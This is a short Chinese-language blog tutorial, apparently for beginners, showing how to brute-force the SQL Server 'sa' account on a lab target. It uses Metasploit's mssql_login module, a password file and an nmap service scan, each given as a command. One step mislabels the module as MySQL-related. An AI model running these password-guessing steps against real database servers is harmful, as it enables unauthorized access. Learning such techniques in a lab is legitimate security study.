白帽***教你Kali Linux：數據庫密碼脆弱性***演練中

1、課前聲明
一、本分享僅作學習交流，請自覺遵照法律法規！
二、搜索：Kali 與編程，學習更多網絡***乾貨！
三、Kali 與編程天天準時更新，敬請學習和關注！
2、資源裝備
1.安裝好 Kali Linux 的虛擬機一臺
2.搭建好Sql server的靶機一個；
3.整裝待發的小白一個。
3、戰略安排
3.1 以靜默方式進入Metasploit（msf）***框架，以下圖所示。
命令：msfconsole -q

3.2 檢索暴力破解Mysql服務的漏洞利用模塊，以下圖所示。
命令：search mssql_login

3.3 利用檢索到的漏洞利用模塊，以下圖所示。
命令：use auxiliary/scanner/mssql/mssql_login

3.4 查看漏洞利用模塊的參數，以下圖所示。
命令：show options

3.5 設置參數，以下圖所示。
3.5.1 命令：set username sa

3.5.2 設置密碼文件，以下圖所示。
命令：set pass_file 路徑
例子：set pass_file /root/passwd.txt

3.5.3 設置***線程，以下圖所示。
命令：set threads 5
3.5.4 查看目標主機的IP地址
命令：ipconfig
3.5.5 設置目標主機的IP，以下圖所示。
命令：set rhosts 192.168.0.102

3.6 在Kali***者主機新建終端利用「nmap」工具對目標主機進行掃描，以下圖所示。
命令：nmap -sV 192.168.0.102

3.7 設置目標主機***端口，以下圖所示。
命令：set rport 49156

3.8 運行***模式，以下圖所示。
命令：run
以下圖所示，綠色代碼表示爆破成功。

小編一個個字敲打創做，可辛苦了，問君能否關注一下呢？你還可搜索:Kali與編程，學習更多呢 ！
點我學習更多Kali Linux***測試與網絡***實戰技巧！